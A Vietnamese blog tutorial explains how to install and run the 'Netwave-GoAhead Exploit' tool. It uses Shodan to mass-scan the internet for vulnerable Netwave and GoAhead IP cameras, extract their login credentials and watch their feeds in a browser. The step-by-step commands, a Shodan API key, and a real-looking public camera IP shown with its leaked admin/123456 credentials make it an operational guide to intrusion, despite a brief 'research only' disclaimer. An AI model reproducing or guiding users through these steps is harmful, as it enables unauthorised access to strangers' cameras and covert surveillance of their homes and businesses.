Cách dùng Netwave-GoAhead Exploit khai thác lỗ hổng Camera an ninh

 


Giới thiệu về Tool

Tool này được bạn Kien Quoc tạo ra và phát triển. Tool có chức năng chính là tìm IP và check 2 loại Camera là Netware IP và GoAhead xem có lỗ hổng nào không. Từ đó xâm nhập vào camera và xem camera thông qua Trình duyệt của bạn.

Hướng dẫn cách sử dụng Netwave-GoAhead Exploit

Lưu ý: bài viết mang tính chất nghiên cứu, nghiêm cấm sử dụng vào mục đích bất hợp pháp. Trường hợp phát hiện Camera bị lỗ hổng, hãy báo ngay cho chủ nhà để nhanh chóng được khắc phục.


Cài đặt tool

Bước 1: Anh em Update Linux của anh em và cài Python 3 và Pip 3 cho mình nhé

sudo apt update
sudo apt install Python3.9.6
(bản mới nhất từ khi ra bài viết này là 3.9.6. các bạn có thể check trên trang chủ của Python nhé!)
sudo apt-get update
sudo apt-get -y install python3-pip

Bước 2: Cài đặt Netware-GoAhead Exploit tool

sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits 

Bước 3: Vô file và cài đặt các gói cần thiết

cd Netwave-GoAhead-Exploits

pip3 install -r ./related.txt

Đăng kí tài khoản trong Shodan.io

Shodan.io là 1 công cụ tìm kiếm cho phép người dùng tìm các loại máy tính cụ thể được kết nối với internet bằng nhiều bộ lọc khác nhau. Trong bài này, Shodan dóng vai trò như công cụ tìm và lọc ip cho mình xem ip nào có thể tấn công được.

Bước 1: Vào Shodan.io tại đây

Bước 2: Chọn SIGN UP NOW

Bước 3: Chọn Register ở góc trên

Bước 4: Nhập thông tin đăng nhập


Bước 5: Vào mail Xác minh với Shodan.io

Bước 6: Vào trang account.shodan.io tại đây.

Chú ý tới API key nhé

Shodan API key

Tìm Camera có lỗ hổng bằng Shodan API key

Nhập câu lệnh sau đây

python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]

Ví dụ của mình sẽ là 

python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0

chạy Netwave-GoAhead Exploit

Nó sẽ chạy như sau

Chạy Tool

Nhiệm vụ các bạn chỉ cần chờ khi nó ra kết quả như vậy

Kết quả tìm camera

Bây giờ mình sẽ thử đăng nhập vào địa chỉ ip 181.56.97.61 với port 80 xem sao

Nhập tên tài khoản và mật khẩu

Nó sẽ bắt nhập tên tài khoản và mật khẩu. Chỉ cần dựa theo những gì tool báo

Ví dụ của cái này sẽ là

  • Username: admin
  • Password: 123456

Kết quả

Kết quả hack cameraKết quả hack camera

Đôi khi bạn sẽ gặp 1 số trường hợp như này

[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />

Đối với cái ip này bạn bỏ giúp mình nhé bởi vì nó không phải Địa chỉ IP của Camera

Truy cập Camera sử dụng IP có sẵn

Với 1 địa chỉ IP có sẵn port

Các bạn chạy cho mình câu lệnh sau

python3 exploit.py -b 1 -i [IP:PORT] -v

Theo ví dụ, Mình có

python3 exploit.py -b 1 -i 192.168.1.5:80 -v

Trong đó

Địa chỉ IP là 192.168.1.5

Port là 80

Với IP list có port

Các bạn sử dụng cho mình câu lệnh sau

python3 exploit.py -b 2 -l iplist.txt -v

Trong đó

iplist.txt là file chứa địa chỉ ip dưới dạng: [IP:PORT]

Ví dụ: 192.168.1.5:80

IP mục tiêu : 192.168.1.5

Port nhắm tới: 80

Đối với cách này sẽ dễ dàng tấn công vào địa chỉ mà mình đã biết hoặc là bạn có sẵn IPlist thì sử dụng cách sau để check là 1 cách rất hiệu quả. sử dụng Shodan cũng được nhưng nó sẽ check của nhiều ip lạ đã được public trên mạng.

Vậy là mình vừa hướng dẫn xong về cách tìm và tấn công camera với công cụ Python. Nếu có bài viết nào hay, đừng ngần ngại gửi đóng góp bài viết về email 1947cyberteam.com@gmail.com, bên mình sẽ biên tập và đăng bài nhé. Xem thêm: Bài tập: Dùng ZoomEye Tìm Camera bị lỗ hổng CVE-2018-9995 tại đây.

Post a Comment

0 Comments